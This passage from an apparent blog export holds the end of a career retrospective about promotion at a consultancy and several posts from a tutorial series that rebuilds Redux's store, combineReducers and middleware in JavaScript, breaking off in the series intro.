that it was pretty crappy feedback. At the time I was completely confused and thought it was crappy, but the more I explored it the more I understood what it mean, even if it was poorly provided.\nPeople who know me know that I can often be an agreeable person; I like making people happy. Well this is one of the hard truths that I had to learn, you can’t always be someone’s best friend, sometimes you have to be the bad guy. Now I’m not saying you need to be an arse to people (although that’s sometimes warranted), but the truth can hurt and you need to be honest to people.\nThis was the crux of the feedback, that sometimes you have to go from friend to manager and make tough decisions, give honest feedback, even if it means being the bad guy.\nIt’s something that I can struggle with to this day, my approach is to try and identify early, rather than to have to be brutal at a later point. This is really how I deal with the concept of ‘fight or flight’, I know I’m more likely to want to ‘flight’ so instead I’ll aim to identify early and address the problem before it gets to that situation.\nBecoming an SC I was promoted to SC in October 2013 which was about 4 years after I started at Readify and over 12 months since I had decided to go for SC. What I found was when I was promoted to SC nothing really changed, I’d been doing some leadership on small teams before and I continued to do it. I was a little be less code focused and that was ok with me, the code was less interesting to me than the problem needing to be solved was.\nAnd now I was content, I wasn’t that keen in being a PC, I saw them as being very process heavy (we had the likes of Steve Godbold, Richard Banks and Tatham Oddie as PC’s then), spending all their time in kanban boards and managing backlogs. I wanted to step away from the code but not that far away.\nAt least so I thought. As I said nothing really changed, back then we were a much smaller team, so I’d been doing a lot of SC activities anyway. What I found was that I was still not really satisfied still but was unsure what I wanted next.\nTo LC and beyond It was time to be introspective again and really look where I wanted to go. You know that interview question “where do you see yourself in 5 years?” and we all laugh at the absurdity of it? Well sometimes it’s really worthwhile to think about it. So it’s time to look at what I’m enjoying most about Readify and I came to the conclusion that I really like understanding problems and looking at solutions, but the specifics of implementation is less appealing.\nI sat down with Bria, our People Manager (what we call HR) and talked about my goals, that I wanted to focus on:\nLeading client solutions Pre-sales People Delivery And this is more what a PC role is about, not card shuffling. So I made a resolve, I was going to be a PC at Readify. But there was a slight hiccup, I wasn’t an LC, so I had that to get first. I do remember saying to someone at the time that I wasn’t really interested in being an LC, but to become a PC it was a notch in the belt I’d have to get.\nThe long road When I started the journey to PC I really didn’t grasp just how big a gap there was between SC and PC (which is partially why the LC role was introduced) and even between SC and LC. For LC you really need to start looking beyond technology and into the business. It’s not just about the how of a solution, but also the why.\nIn fact the first time I thought I was ready for promotion to LC I was turned down (more accurately I was advised to not apply at all as I wasn’t ready). I thought I was ready, having come off a successful large (for the time) engagement. I had gaps to fill around business understanding and scrum (at that point in time I hadn’t done PSM or PSPO I’d only learnt on the job so didn’t necessarily get it).\nAt the end of 2014 I was given an opportunity to lead an IoT project and this was my “big project” that helped me really grow from a SC to LC. I did a lot of learning about just why we were doing that project, what did it mean in their overall business objectives and how do other projects they are looking at fit into it?\nI learnt quite a bit about effective communication as well, one particular insight was after a fairly heated discussion with a client’s tech lead in which we both got a bit too emotionally invested in our perspective.\nI also pushed harder to get into presales. This was a good way for me to really expand my understanding of how different businesses work, the kinds of problems they come to Readify to try and solve and how we can do it. It’s also a great way to work on communication.\nWho’s your audience? Effective communication is really important in the LC and PC role. As someone who has some literacy problems (I struggle quite a bit with reading, writing and spelling) I knew this is something I’d want to work on.\nOnce aspect of effective communication is knowing your audience and framing your communication appropriately. Say you’re in a sales meeting, there’s going to be a mix of technical and non-technical, and you’re talking about whether you’d use Angular, React or another web framework. Do you a) go into talking about the differences in mutability, two way data binding and bringing in redux or do you b) ask about what they already use/have tried and where the dev teams pain points currently are?\nThe technical person in me wants to launch into the difference between $scope and redux state, but I know the non-technical members of the audience are going to glaze over and really, it’s not important, it’s important that you’re focusing on the why.\nThe next is knowing how to get to a point (yes, I’m appreciating the irony of that being so far down this post). In written communications this can be in the form of putting the important information up front, an executive summary if you will, but remembering that time is limited so people are going to read as little as they can, so make sure your most important points are front and centre.\nI got put onto a book called Brilliant Business Writing which I’ve found very useful in helping me understand how to construct written documents for different audiences.\nBusiness understanding Another aspect that I worked on as I went for LC was getting to understand business, both Readify and clients. In an LC role you move away from a single project delivery, instead it’s starting to look at delivery across multiple projects within a client and multiple clients.\nGoing back to IoT project on this, as we started to build the project out we started conversations on post-MVP, where it could be taken, other tools they had that we could integrate with that already existed in their business and so on. Some of these opportunities ultimately fizzled out, it was still an opportunity to look wider.\nThis comes down to what I refer to as peripheral listening. The more you hear about what’s going on around you the more chances you’ve got to pick up on what’s happening. This is how we managed to get 3 additional people on board at my current client, I overheard a conversation, brought myself into it and opened a lead.\nBut business knowledge isn’t just our clients, it’s also Readify, how do we operate, why are decisions made as they are made, etc. For me this started with looking at how to better ‘give back’ to the state. I wanted to help “fix” issues that I saw in our culture, in our processes, the way we engaged with each other. This coincided with what others were thinking at the time and saw the birth of the leadership group. While starting a new LG isn’t really viable for people currently targeting LC, what it really gave me was a forum to raise and discuss ideas, because prior to the LG there really wasn’t any way to do that. Now it’s a lot easier as there’s somewhere you can go for people to facilitate activities that you want to undertake.\nHunting down PC I was more confident the second time I applied for LC, but still had lingering doubts. I had done a lot of work with Bria and Steve Godbold on the gaps I needed to fill, I had regular catch ups with other people to talk through where I was at and what they saw as gaps, but still doubt lingered. Ultimately the hard work paid off and in July 2015 I was promoted to LC, but ultimately I wasn’t done, I wanted to be a PC not an LC, LC was just a stepping stone (I’d actually said to someone prior to getting LC that I was going to be the next PC in NSW, we’d just lost Ducas from the role, Steve had moved to Deliver Manager so we only had a single PC, we needed more PC’s, and I was going to be one).\nI set myself a realistic goal of 18 months for PC, but I had a stretch goal of 12 months. I knew it’d be hard work to achieve in 12 months (it was nearly 5 years work to get to LC), but I was going to go for it.\nMy son was born at the end of July 2015 which meant that I had some time off to plan (in amongst the whole ’learning to be a dad thing’!) and I was looking at if I was to be a PC what would that look like? I didn’t want to be Richard but with a glorious head of hair, I wanted to have my own identity as a PC. If you look around the country at the other PC’s they all have their own slant to the role, bringing different things to it and that makes it a very hard role to truly quantify.\nWhat would Aaron the PC look like? Process isn’t my passion, and as I said above that was my original perception of a PC, they were focused on process. Now this isn’t entirely true, sure you may do a bit of that on a client, but it’s more higher level discussions than that, both technical and non-technical.\nTechnical is my strong suite so I knew that I’d always be a technical focused PC, but I couldn’t just rely on that as I didn’t want to have a single facet to my PC role. Well there’s another area that I’m passionate about, that’s leadership.\nLastly I wanted to expand my business knowledge even further and to do this I wanted more presales experience. Luckily this fitted in nicely when I got back from paternity leave so that while I waited for a project to kick off I got to do quite a lot of presales and workshops (for a few months my average engagement length was 2 days).\nGrowing leadership Leadership is one of the hardest things to grow and not just within Readify. For me I saw that we had this LG but for the most part we weren’t doing anything, we’d catch up for dinner once a month (if we were lucky) and we didn’t collaborate with other LG’s around the country.\nFirst step was to get our house in order, I chucked a calendar event in for the 2nd Monday of every month for the LG to meet. I took the approach of ‘beg for forgiveness’ over ‘asking for permission’ when sending it out as we’d talked about more frequent meetings but never really done it. And this is how the monthly LG meeting was born, the week before I’d chase people for some agenda points (and there were months where we didn’t really have much), we’d have a meeting chair and some notes taken, etc.\nWith the state LG working better it was time to look national. Based on an off-hand comment by Rob Moore I stuck a bi-monthly skype call in the calendar of all LG members in Readify for us to chat about whatever.\nOn client site I started to press companies to think more about delivery as a whole and tried to get myself involved much earlier on in their decision making. With my current client I started doing brown bags to upskill their developers while talking to the CTO and dev manager around wider changes that could be made. And this is where I see the leadership growth in a PC over an LC, being able to work with execs on change.\nGetting down to business I was getting a better idea on how Readify as a business works but there was still an area that was a real gap for me, finance. I really didn’t get how we make money.\nI took an opportunity while I was down in Melbourne to sit with Fraser, our CFO, and get a ‘finance 101’ talk from him, and wow, was it useful! It gave me a better understanding of our ability to scale the business and different ways we are looking to expand rather than just “hire more people” (and the challenges that itself poses).\nGetting an understanding of this helped me better appreciate the behind the scenes work that goes on to make our day to day better, why we’re constantly hounded to do timesheets (without them there’s no way to know how much we’re earning!), pulling the entire state out for an event is something that’s feasible but needs to be planned for, etc.\nAlso while I was in Melbourne I spoke to a few other members of the exec team to better understand their spheres of influence and how I (as a PC) would work with them. For example I know we have a Managed Services team, we’ve had one for most of the time I’ve been at Readify, but I’ve never really understood what they do or how they work. So I spent time with the head of that department to understand the team better and from this I believe there’s a perception issue with Managed Services in NSW, given the amount of opportunities we see in that space it’s something that could be valuable to have locally. We talked about things such as how it works in QLD, what was learnt through setting them up, and so on.\nThe other reason I met with many of the execs was to grow my brand with them. While I’ve known people like Steve and Tatham since before I started at Readify but to be a PC I really needed them to see “Aaron the PC”, not “Aaron the dev”, which is how they’ve known them for my career. From my perspective this is really important as a PC, that you’re known to the exec team, that they know what you can do and can also see you as not just a technical person but as someone who understands the whole of the Readify business. It was also an opportunity to grow my relationship with those who I don’t know as well, who I haven’t really spent much time with over the years.\nBetter collaboration Every Monday the LC’s (and PC) were all non-billable and we’d sit in the sales meeting/state of play before heading out to visit the teams that we worked with. Ultimately this was not the best use of our time, the meeting could drag on and we’d have fairly minimal input. The valuable part of it for me was hearing from the other LC’s about our projects, looking at overlaps between the challenges we were experiencing and looking at how to learn from each other’s approach.\nI suggested to the other LC’s that we have a separate meeting at the same time as the sales meeting to talk about our engagements, rather than sit in the sales one, and thus we started catching up weekly to share our experiences, ask each other for ideas on how to approach challenges that we were having and ultimately operate as a collective across the state. There was no core agenda, no notes taken, just a chance to talk, or vent, and to learn.\nTo PC or not to PC As May rolled around I had to make a decision on whether I’d target my stretch goal of applying for PC after 12 months or push back to my original goal. As you can probably guess I decided to go for it, which meant that I needed to really get the ball rolling in terms of writing the promotion proposal.\nBefore putting pen to paper (metaphorically speaking) I spent time looking at how I wanted to put my proposal together and importantly what evidence I had to support my application.\nI decided to speak to Michelle, our head of HR, because I wanted to get an idea of what she looks for (in a People sense), because as I mentioned above every PC is different. We talked through how to provide evidence when a lot of what I’d done had been solo and that I hadn’t worked with any PC for at least 12 months.\nOut of this I decided to use the ‘Request Feedback’ feature of MyCareer (our performance management system), setup a few questions that I thought would give me most value and sent it out to a broad spectrum of people, those who were on engagements I was LC’ing, LG members, sales, etc. My goal was to how gather feedback on how I’m seen across different departments and through different types of interactions.\nWith everything gathered I put together a promotion proposal, looked back over my LC one to compare/contrast what I put in there. Once I was happy with the first draft I contacted a few people to ask them to review it so I could fill any gaps they saw (this included my wife who’s very good at picking up on my spelling/grammar issues :P).\nThe final milestone met As you are already aware I made PC. I won’t say I wasn’t a little surprised but by the time I submitted I was highly confident that I’d done everything that I could think of to do to get there. It was a lot of hard work, a lot of late nights, weekends, cursing people and processes.\nIt’s been a about 2 months now that I can have my signature looking all pretty and I’d like to say that things are amazingly clear, that I’ve now got insight into how to solve problems that I didn’t know how to solve before, but the reality is it’s business as usual. Clients are still clients, projects are still projects and delivery still has to happen. I’ve got things to learn and hope that this isn’t the end of the story.\nAnd that’s a wrap Recently a friend invited me to interview for a role on their team they were trying to fill and during the interview I was asked “Where do you see yourself in 5 years?” and this caused me to pause because, well, I honestly don’t know, this is the first time in years when I haven’t been working towards PC and don’t have an immediate plan for what’s next.\nBut it got me thinking about how I got here, got to PC at Readify and what I did along the way. So I decided to write it down as a bit of a retrospective on myself and how I have grown over and change over the years; what I’ve ultimately learnt.\nThis story has been 6 years in the making and 1 month in the authoring, and probably the most I’ve put into a single blog post ever.\nWhat where do I see myself in 5 years? I honestly have no idea. 5 years ago I didn’t really think I’d be a PC, so trying to predict anything again seems like a pretty bad idea! What I do know is that I’m excited to be in the PC role here at Readify and am looking how to make the most out of it.\nI’ve written this as much for me as I have for anyone else, it’s been a chance to brain dump and reflect, but if you made it this far, kudos for sticking through ~4000 words and countless grammatical errors!\n", "id": "2016-08-29-SC-to-PC" }, { "title": "Learning redux with reducks - middleware", "url": "https://www.aaron-powell.com/posts/2016-07-17-learning-redux-with-reducks-middleware/", "date": "Sun, 17 Jul 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "Time to take a look at middleware", "content": "Last time we learnt how multiple reducers worked and today we’re going to look at intercepting the pipeline of actions to reducers, through the use of middleware.\nWhat is middleware? When working with frameworks you’re likely to hit a situation where you want to intercept the pipeline of functionality. This is quite common across frameworks these days as they open up a method of extensibility without requiring class overrides or forking source code.\nThe basic premise is that you provide a function that will be run when the processing is happening. Generally the middleware will be provided with the data for the pipeline that’s being processed and a callback to the next method in the pipeline. In an ASP.Net or ExpressJS application this would be when a request comes in, in redux this would be when an action is being dispatched.\nMiddleware in redux In redux middleware is used to intercept the dispatch method as it is being invoked, allowing you to interact with the action before the reducer(s) are invoked.\nSo where would you use this? One example is if you had an asynchronous action payload, say an AJAX call. Well the real payload isn’t known when you create the action, it’ll come later once the AJAX call is completed. So you might want to suspend the call to the reducers until after the call completes, this creating the payload from the response. Now you could buffer the call to store.dispatch until after the AJAx call completes, but now you’re application is a hybrid of redux and non-redux logic.\nBut for this post we’re not going to use an AJAX call, instead we’re going to use validation. I want certain types of validation against the payload of certain actions, example - you need a non-empty value for the payload of ADD_TODO.\nAnatomy of a middleware function In redux a middleware function is actually made up of a series of chained, or curried, functions, with a signature like:\n1 let middlewareFunction = store => next => action => next(action); So we get:\nA store, well actually an API that is a subset of the store The next “step in the chain” The action being invoked Well, if we want to make a validation middleware it’d be like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import { ADD_TODO, ADD_ABORTED } from "../actions/types"; export const notEmptyValidator = store => next => action => { if ( action.type === ADD_TODO && (!action.payload || !action.payload.trim()) ) { return store.dispatch({ type: ADD_ABORTED, payload: "The name of the todo cannot be empty or a blank string" }); } return next(action); }; As you can see here we’re checking some information about the incoming action. If our validation fails we instigate a new dispatch call to the store, if it doesn’t we just pass through.\nImplementing middleware support Within redux middleware is tied together through a applyMiddleware function, the result of which becomes the third argument of our createStore call.\nWe’ll start by updating our createStore method:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 export default function createStore (reducer, initialState, enhancer) { if (typeof initialState === 'function' && typeof enhancer === 'undefined') { enhancer = initialState; initialState = undefined; } let state; let currentSubscriptions = []; let nextSubscriptions = currentSubscriptions; if (typeof enhancer !== 'undefined') { return enhancer(createStore)(reducer, initialState); } ... }; So we’ve added a third argument to the function, which if provided (or the initialState is skipped) is invoked and returned. You’ll notice that the enhancer (which is our applyMiddleware or any other approach to extending our store) takes the store as an argument and returns a new function that mimics the createStore behaviour, so we can immediately invoke it and return it.\nImplementing applyMiddleware Alright, let’s get started on implementing our applyMiddleware feature:\n1 2 3 export default (...middlewares) => { return createStore => (reducer, initialState) => {}; }; The first thing we need to do is create our store. Low and behold we’ve been provided everything that we could need to create the store too!\n1 2 3 4 5 6 export default (...middlewares) => { return (createStore) => (reducer, initialState) => { const store = createStore(reducer, initialState); ... }; }; Now this is were we learn really how the middleware works internally, we create a new dispatch method which is a chain calling through all the middlewares. We’ll start by grabbing a reference to the dispatch method locally, with this local one we can change it without overriding the original reference on store.\n1 2 3 4 5 6 export default (...middlewares) => { return createStore => (reducer, initialState) => { const store = createStore(reducer, initialState); var dispatch = store.dispatch; }; }; Next we’ll invoke the first method in our middleware function, and that receives the store instance provided to it, but we’re only going to give it a subset of the store API, really all we want the middleware to have access to is getState and dispatch. We don’t want middleware subscribing now do we? So how about we setup our middleware chain:\n1 2 3 4 5 6 7 8 9 10 11 12 13 export default (...middlewares) => { return createStore => (reducer, initialState) => { const store = createStore(reducer, initialState); var dispatch = store.dispatch; var middlewareAPI = { getState: store.getState, dispatch: action => dispatch(action) }; var chain = middlewares.map(m => m(middlewareAPI)); }; }; And the last step is that we need to return a store, because after all, this method is being used to create the full store instance! While we have the original store, we’re not going to use that as our return value, because we’re going to create a new dispatch method, as I mentioned earlier. This dispatch method is actually a wrapper around the original dispatch, but is a recursive call through each middleware. To do this I’m going to pull the logic out into a new function, in a new file, called compose. This compose function will take an array and return a new function that we invoke with the final method for the chain to execute and will return a new entry point function. Let’s start with it’s usage:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import compose from "./compose"; export default (...middlewares) => { return createStore => (reducer, initialState) => { const store = createStore(reducer, initialState); var dispatch = store.dispatch; var middlewareAPI = { getState: store.getState, dispatch: action => dispatch(action) }; var chain = middlewares.map(m => m(middlewareAPI)); dispatch = compose(...chain)(store.dispatch); return { ...store, dispatch }; }; }; You can see we use compose to create a new dispatch call and then combine that with the spread operator to create a new store but using our reworked dispatch call.\nSo how does compose look?\n1 2 3 4 5 6 7 8 9 10 11 export default (...funcs) => { if (!funcs.length) { return arg => arg; } const last = funcs[funcs.length - 1]; const rest = funcs.slice(0, -1); return (...args) => rest.reduceRight((composed, func) => func(composed), last(...args)); }; It’s not particularly complex, you’ll see that there’s a noop handler there (if you call it without any functions), but assuming there are some functions we grab the last one, walk backwards through the remaining and append the last on the head, bound to the default value, our next argument, which in our usage so far is store.dispatch.\nConclusion There you have it, we’ve added middleware to reducks! We’ve seen that middleware is really just overriding the way dispatch works so that it keeps calling itself in a chain, passing through actions as needed.\nAs usual you’ll find the code here.\n", "id": "2016-07-17-learning-redux-with-reducks-middleware" }, { "title": "Learning redux with reducks - multiple reducers", "url": "https://www.aaron-powell.com/posts/2016-06-27-learning-redux-with-reducks-multiple-reducers/", "date": "Mon, 27 Jun 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "Working with multiple reducers", "content": "Last time we added some tests to our codebase to illustrate how our implementation of Reducks works against Redux. This time I want to look to expanding the features of Reducks and today it’s to support multiple reducers.\nUnderstanding multiple reducers In a suitably complex Redux application you’re going to want to break down your reducer into smaller reducers. Let’s take our reducer code (abridged):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 export default function (state, action) { switch (action.type) { case TOGGLE_VISIBILITY_FILTER: ... case ADD_TODO: ... case COMPLETE_TODO: ... ... } }; Now you can see where this is going, we’re going to have a very large switch statement, resulting ugly code. So you might want to split this down into smaller functions, but there’s another reason you might want to use multiple reducers is that you want to split your state apart. This might be done because, taking our example above, the visibility filter is independent from the lost of todos, so we could have reducers that only concerns itself with the visibilityFilter. Now we would have reducers looking like:\n1 2 3 4 5 6 7 8 9 10 11 12 13 function visibilityFilterReducer (state = false, action) { if (action.type === TOGGLE_VISIBILITY_FILTER) { return !state; } return state; } function todosReducer (state = [], action) { switch (action.type) { ... } } Awesome, we’ve got a couple of smaller reducers, but how do we use them given that createStore takes a single reducer?\ncombineReducers This is a function produced by Redux that takes an object that has all our reducers as properties, like so:\n1 2 3 4 export default combineReducers({ visibilityFilter: visibilityFilterReducer, todos: todosReducer }); What the combineReducers function returns is a new function that takes two arguments, state and action, which looks very much like a reducer doesn’t it!\nNow here’s the tricky thing, the object you pass into combineReducers is the shape of the state that you’ll have for your application, but each reducer only has access to their tree, meaning that the visibliltyFilter property is all that is accessible to the visibilityFilterReducer.\nImplementing the function So let’s get started on our implementation:\n1 export default function combineReducers(reducers) {} We’re going to need all those reducer functions so let’s deconstruct our object and get them:\n1 2 3 4 5 export default function combineReducers(reducers) { var keys = Object.keys(reducers); return function(state = {}, action) {}; } So we’ve got our reducer names, we’re returning our new reducer function, let’s implement it:\n1 2 3 4 5 6 7 8 9 10 11 12 13 export default function combineReducers(reducers) { var keys = Object.keys(reducers); return function(state = {}, action) { return keys.reduce((newState, key) => { var reducer = reducers[key]; var currentState = state[key]; newState[key] = reducer(currentState, action); return newState; }, {}); }; } Ok, how does it work? Well we take our reducer names (keys) use the reduce function with an initial state of an empty object. For each reducer we:\nGet the current state (which will be the initial state provided to the store, or undefined is we use the default argument set on the new reducer function) Invoke the reducer with the current state and the action Return the new state Because we’re using the reduce array method we then combine all the new states into a new object, using the name as the reducer for the property. So after our first run (the @@INIT action) our state would look like:\n1 2 3 4 { visibilityFilter: false, todos: [] } Pretty nifty! Since we use the reduce method we create a new state object every single time, meaning that we don’t have to worry about mutating the previous state object (sure a reducer could do that, but we don’t :P).\nAnd then we’re done.\nConclusion And that is how we implement multiple reducers in Reducks. Ultimately it’s a bit of a misnomer, we still only have a single reducer as far as the store knows, but internally we’re breaking apart state, using different functions to handle different parts of the state tree and creating a single application state.\nNow the combineReducers function doesn’t have to be done this way, I’m just looking at how Redux does it, but if you didn’t want the reducers to handle each branch, instead have access to the whole tree you could use an array of reducers and loop over them, providing the state to each one.\nI’ve gone ahead and updated the code, you can find it at this tag, I’ve also taken it one step further than we looked at above and split the incomplete and complete todos apart. I’ve also updated the tests to understand the new structure.\n", "id": "2016-06-27-learning-redux-with-reducks-multiple-reducers" }, { "title": "Learning redux with reducks - creating a Store", "url": "https://www.aaron-powell.com/posts/2016-06-09-learning-redux-with-reducks-creating-a-store/", "date": "Thu, 09 Jun 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "An introduction to the Store and how to make a simple one.", "content": "Last time we learnt the basics of what Redux is and what it does, now it’s time to start looking at how it works.\nBefore we get started, I’ve created a little app that we’ll be using. Because I wanted to illustrate that Redux isn’t just for React our sample application is not going to be a React application, it’s actually going to be a little console application. You’ll find the starting point for the code here.\nIt’s (obviously) a todo application, our quintessential demo app, which has a Redux Store, some Actions and Reducers. I’ve also created a couple of unit tests that indicate how it works. The goal of the rest of this series will be to swap out the import { ... } from 'redux' for the same calls into a library we’ll create called Reducks.\nOur first step is to create the store, and this is done by a function exposed by Redux, createStore.\nImplemented createStore This function is the core of Redux, it takes three arguments:\nA reducer Initial State Enhancers We’re going to ignore Enhancers for the moment, we’ll look at that later in the series, so we’ll focus on supporting the first two arguments.\nThe return value of calling createStore is a Store instance, which has four methods on it:\ngetState dispatch subscribe replaceReducer Again, to keep this article short we’ll not cover the replaceReducer method, we’ll look at that later in the series.\nSo, our basic code will look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 const createStore = function(reducer, initialState) { const getState = function() {}; const dispatch = function(action) {}; const subscribe = function(fn) {}; return { getState, dispatch, subscribe }; }; export default createStore; Pretty simplistic huh! Now let’s start making those functions do something.\ngetState The getState function is our window into what’s happening within Redux, our ability to get the data within our application. The state in Redux is really just a plain old JavaScript object, you can define it any which way you like, you can use a library like Immutable.js if you want, it’s just an object.\nFor our Store I’m going to want to track a state within it:\n1 2 3 4 const createStore = function (reducer, initialState) { let state = initialState; ... Now we have a local state variable which we initialise from the consumer, and I bet you can guess how getState looks when implemented!\n1 2 3 4 5 ... const getState = function () { return state; }; ... Fantastic, we can now get the state of our Redux store!\ndispatch The dispatch function is what we use when we need to fire off an Action in Redux, which is why it takes an action argument to it. You’d use it off a store like so:\n1 store.dispatch({ type: "ADD_TODO", payload: "Todo name" }); Internally what it does is invokes the reducer which we provided the Store in createStore, along with the initial state of the Store, and then the result of that becomes the new state. With an Action there needs to be a type property, so you’d probably want to do some validation there as well, making a dispatch implementation look like so:\n1 2 3 4 5 6 7 8 9 10 ... const dispatch = function (action) { if (typeof action.type === 'undefined') { throw Error('A `type` is required for an action'); } state = reducer(state, action); return action; }; ... One thing you’ll notice about the implementation is that we return the action that was passed in. This is so that the place that dispatched the action could do something once it’s completed. But running directly after the dispatch completes might be a problem, especially when you start working with asynchronous payloads, so for that we’d want to subscribe to the Store.\nsubscribe The final piece of the puzzle when working with your Store is knowing when the Reducer has finished, and to do that in a way that is independent of where the dispatch was called from. We do this via the subscribe method that a Store exposes.\nThis method takes a function as the argument, the subscriber isn’t passed any arguments, it’s up to the listener to work out how to get to the state, generally using the getState method. It returns a new function which you can use to unsubscribe, so you don’t have hold a reference to the listener function.\nThe implementation looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... let subscriptions = []; const subscribe = function (fn) { if (typeof fn !== 'function') { throw Error('The provided listener must be a function'); } var subscribed = true; subscriptions.push(fn); return function () { if (!subscribed) { return; } var index = subscriptions.indexOf(fn); subscriptions.splice(index, 1); subscribed = false; }; }; ... Well now that we have the ability to subscribe we probably want to actually invoke the listeners when dispatching:\n1 2 3 4 5 6 7 8 9 10 11 12 const dispatch = function (action) { if (typeof action.type === 'undefined') { throw Error('A `type` is required for an action'); } state = reducer(state, action); subscriptions.forEach(fn => fn()); return action; }; ... To easy!\nNow one thing you might want to add to the subscribe function is mutation hold on the subscribers collection. The reason for this that you want the collection of listeners shouldn’t change while a dispatch is running. So let’s update our methods to handle this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 ... let currentSubscriptions = []; let nextSubscriptions = currentSubscriptions; const ensureCanMutateNextListeners = function () { if (nextSubscriptions === currentSubscriptions) { nextSubscriptions = currentSubscriptions.slice(); } }; const subscribe = function (fn) { if (typeof fn !== 'function') { throw Error('The provided listener must be a function'); } var subscribed = true; ensureCanMutateNextListeners(); nextSubscriptions.push(fn); return function () { if (!subscribed) { return; } ensureCanMutateNextListeners(); var index = nextSubscriptions.indexOf(fn); nextSubscriptions.splice(index, 1); subscribed = false; }; }; const dispatch = function (action) { if (typeof action.type === 'undefined') { throw Error('A `type` is required for an action'); } state = reducer(state, action); var subscriptions = currentSubscriptions = nextSubscriptions; subscriptions.forEach(fn => fn()); return action; }; ... So here we have a function ensureCanMutateNextListeners that, when invoked, checks if the two arrays are the same array reference, if they are, use slice to clone currentSubscriptions so that when we modify the nextSubscriptions array (adding or removing a listener) it won’t impact any currently running dispatch pipeline. The goal here is to ensure that the listeners that are used by dispatch are a point in time, for when the dispatch started.\nInitialising your Store There’s one last thing that the Store does when you call createStore and that is to trigger an initialisation action. In Redux this can be observed by the action redux/@@INIT being dispatched, but for our Reducks library we’ll trigger reducks/@@INIT. We’ll add this to the very last step before returning the Store object:\n1 2 3 4 5 6 7 8 9 10 11 ... const INIT_ACTION = 'reducks/@@INIT'; dispatch({ type: INIT_ACTION }); return { getState, dispatch, subscribe }; ... This will cause the Reducer to be run with the initial state (if provided). Now, you’re reducer probably isn’t subscribing to reducks/@@INIT (or redux/@@INIT), so it’ll be a noop, but still, it gives you the entry hook if you so desire it.\nConclusion The Redux store is the core part of the application, but really it’s quite simplistic in how it is implemented, but really quite powerful. We’ve seen how the three core methods, getState, dispatch and subscribe are implemented to make our Store operational.\nYou’ll find the code in the Reducks GitHub repo on the reducks-baseline tag, in the src folder.\nNext time we’ll plug Reducks into our sample application and tests to make sure that it works correctly!\n", "id": "2016-06-09-learning-redux-with-reducks-creating-a-store" }, { "title": "Learning redux with reducks - tests and demo app", "url": "https://www.aaron-powell.com/posts/2016-06-09-learning-redux-with-reducks-tests-and-demo/", "date": "Thu, 09 Jun 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "Converting our tests and demo across for use with Reducks", "content": "Last time we started creating our Reducks library by implementing the createStore and while I have all confidence in my ability to write bug free code we do have some tests in the demo app, so let’s use them.\nSo, where do we start?\nAbstracting createStore It’s actually not that complex in the way you would do this, normally within the code base you would have:\n1 import { createStore } from "redux"; The next step is change what we export to instead of just being the function to run you wrap it in. So with our index.redux.js file I have renamed that to index.js and added a new export:\n1 2 export default function (createStore) { ... Now we can create a new index.redux.js file that looks like so:\n1 2 3 4 import { createStore } from "redux"; import app from "./index"; app(createStore); And we can also create index.reducks.js:\n1 2 3 4 import { createStore } from "../src"; import app from "./index"; app(createStore); Then you can run it:\nPS> npm run reducks-demo Testing I’m using mocha as my test framework so normally you’d write a test like so:\n1 2 3 4 5 describe('set visibility filter', () => { it('should change visibility when SET_VISIBILITY_FILTER action fired', () => { ... }); }); Well I’d be remiss to not ensure that the tests work with both libraries, so to do that I’m going to wrap the it scenario so that I can inject the the createStore function (and I also pushed it into a separate file):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import { setVisibility } from "../examples/actions"; import { expect } from "chai"; import creator from "../examples/stores"; export default { "should change visibility when SET_VISIBILITY_FILTER action fired": createStore => done => { const store = creator(createStore); const initialState = store.getState(); store.subscribe(() => { const nextState = store.getState(); expect(nextState.visibilityFilter).not.to.equal( initialState.visibilityFilter ); done(); }); store.dispatch(setVisibility(!initialState.visibilityFilter)); } }; Now let’s change how our test is setup:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 import * as redux from "redux"; import * as reducks from "../src"; describe("set visibility filter", () => { describe("redux", () => Object.keys(visibilityFilterTests).map(key => it(key, visibilityFilterTests[key](redux.createStore)) )); describe("reducks", () => Object.keys(visibilityFilterTests).map(key => it(key, visibilityFilterTests[key](reducks.createStore)) )); }); Using Object.keys I can go through the hash that’s exported and create the it call, passing in the createStore. For readability I’ve also wrapped the test scenarios in a nested describe so that I can identify which library the tests were run against.\nConclusion This was a simple little post where we looked at how we refactored the existing code to support being able to use different implementations of Redux and support our test scenarios as we work on more features.\nI’ve updated the repository with a new tag that shows the progress.\n", "id": "2016-06-09-learning-redux-with-reducks-tests-and-demo" }, { "title": "Learning redux with reducks - intro", "url": "https://www.aaron-powell.com/posts/2016-06-06-learning-redux-with-reducks-intro/", "date": "Mon, 06 Jun 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "A start in the series about learning the inner workings of redux", "content": "Over the last 18 months I’ve been working with React and throughout that time I’ve used a number of different design patterns. For the past 6 months I’ve been primarily using Redux and I’ve found it’s beauty in the utter simplicty of it.\nI’m the kind of person who likes to know how things work at the low levels though, because I feel if you know the low levels then you’re going to be better informed about whether something is right or you’re holding a hammer.\nTo this end I’ve decided to write a blog series diving into Redux and looking at creating it from the ground up, to do this I’m going to create a little library called Reducks (get it!).\nNow, while it’s common to come across Redux in the React community Redux is more than just a React library, and that’s the topic for this first blog post, a look at the basic architecture of Redux.\nIt’s all about data flows When I’m introducing Redux to people the one critical point that I want them to take away is that Redux is about how data flows through an application. To achieve this there are three core components:\nAction Reducer Store It’s also cyclic notion, a Store will Dispatch an Action to get data, which is then passed to a Reducer which results in updated data for the Store.\nActions Actions are really simple objects, they are responsible for providing the instructions. Generally speaking an Action will have a type property on it that represents the what to be done. Now, if you’re implemeting Redux from scratch in 